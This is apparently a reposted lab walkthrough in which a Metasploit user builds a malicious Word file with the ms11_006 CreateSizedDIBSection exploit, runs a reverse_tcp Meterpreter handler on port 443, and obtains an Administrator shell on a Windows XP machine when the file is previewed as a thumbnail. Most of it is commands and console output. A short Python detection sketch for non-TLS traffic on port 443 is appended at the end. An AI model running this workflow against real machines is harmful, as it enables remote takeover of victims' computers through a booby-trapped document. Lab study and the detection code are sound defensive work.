Metasploit file format vulnerability penetration attack (shell successfully obtained)

Source: Internet
Author: User
Tags: sessions, win32

Environment: BT5R1

msf > use windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(ms11_006_createsizeddibsection) > set LPORT 443
LPORT => 443
msf exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/
OUTPUTPATH => /opt/framework/msf3/data/exploits/
msf exploit(ms11_006_createsizeddibsection) > show options

Module options (exploit/windows/fileformat/ms11_006_createsizeddibsection):

   Name        Current Setting                     Required  Description
   ----        ---------------                     --------  -----------
   FILENAME    msf.doc                             yes       The file name.
   OUTPUTPATH  /opt/framework/msf3/data/exploits/  yes       The output path to use.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.11     yes       The listen address
   LPORT     443              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms11_006_createsizeddibsection) > exploit

[*] Creating 'msf.doc' file ...
[*] Generated output file /opt/framework/msf3/data/exploits/msf.doc
msf exploit(ms11_006_createsizeddibsection) > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.11:443
[*] Starting the payload handler...
msf exploit(handler) > sessions -l

Active sessions
===============

No active sessions.

msf exploit(handler) >

Copy msf.doc onto the XP machine, then double-click it: BT5 does not respond.

Later, I switched the folder to thumbnail view; without double-clicking msf.doc, BT5 reacted (the book said to open the document, which I estimate is an error).

msf exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.1.143
[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.143:1099) at 2013-05-14 19:32:47 -0400

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  ROOT-4556186478\Administrator @ ROOT-4556186478  192.168.1.11:443 -> 192.168.1.143:1099

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:44 -0400  .
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:43 -0400  ..
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:13 -0400  Application Data
40777/rwxrwxrwx   0       dir   2013-05-14 10:14:40 -0400  Cookies
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Desktop
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:21 -0400  Favorites
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:22 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2013-05-14 11:30:17 -0400  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  NetHood
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2013-05-14 11:30:35 -0400  Recent
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:02 -0400  SendTo
40555/r-xr-xr-x   0       dir   2013-05-14 17:51:30 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2013-05-14 10:10:10 -0400  Templates
100666/rw-rw-rw-  1024    fil   2013-05-14 11:32:49 -0400  ntuser.dat.LOG
100666/rw-rw-rw-  1       fil   2013-05-14 10:23:33 -0400  ntuser.ini

meterpreter > sysinfo
Computer        : ROOT-4556186478
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > shell
Process 1888 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>

If you switch to the Simplified Chinese version of XP and view the folder with thumbnails, the shell is not obtained.
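The handler above listens on 443 with a plain reverse_tcp payload, so nothing on that flow looks like TLS: the victim's first bytes are not a ClientHello, and the listener itself speaks first when it pushes the stage ("Sending stage (752128 bytes)"). The following detection sketch is an added example, not part of the original write-up; the flow-record layout and the sample flows are constructed.

```python
"""Flag TCP flows on 443 that do not behave like TLS (added example, constructed data)."""
from dataclasses import dataclass

TLS_HANDSHAKE = 0x16  # TLS record type for a handshake message


@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    first_sender: str   # "client" or "server": which side sent the first payload bytes
    first_bytes: bytes  # first payload bytes observed on the flow (assumed field)


def looks_like_tls_client_hello(data: bytes) -> bool:
    """A TLS session opens with a client-sent handshake record: 0x16 0x03 0x0X."""
    return len(data) >= 3 and data[0] == TLS_HANDSHAKE and data[1] == 0x03 and data[2] <= 0x04


def suspicious_443_flows(flows):
    """Return flows on 443 where the server spoke first or the client's opening
    bytes are not a TLS handshake. A staged reverse_tcp matches the first rule:
    the listener sends the stage right after the connect, before the client says anything."""
    hits = []
    for f in flows:
        if f.dport != 443:
            continue
        if f.first_sender == "server" or not looks_like_tls_client_hello(f.first_bytes):
            hits.append(f)
    return hits


# Constructed sample flows; the second one mimics the listener pushing the
# 4-byte little-endian stage length (752128 = 0x000B7A00) before the stage.
SAMPLE_FLOWS = [
    Flow("192.168.1.143", "203.0.113.10", 443, "client", bytes.fromhex("160301")),   # ordinary TLS
    Flow("192.168.1.143", "192.168.1.11", 443, "server", bytes.fromhex("007a0b00")),  # stage length from listener
    Flow("192.168.1.143", "192.168.1.11", 443, "client", bytes.fromhex("47455420")),  # plaintext "GET " on 443
    Flow("192.168.1.143", "192.168.1.11", 80, "client", bytes.fromhex("47455420")),   # HTTP on 80, out of scope
]

if __name__ == "__main__":
    for f in suspicious_443_flows(SAMPLE_FLOWS):
        print(f"ALERT {f.src} -> {f.dst}:{f.dport} first={f.first_sender} bytes={f.first_bytes.hex()}")
```

Port 443 is a common choice for a listener precisely because it is rarely blocked outbound, so a "non-TLS on 443" rule is cheap and catches this configuration regardless of how the document was triggered.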

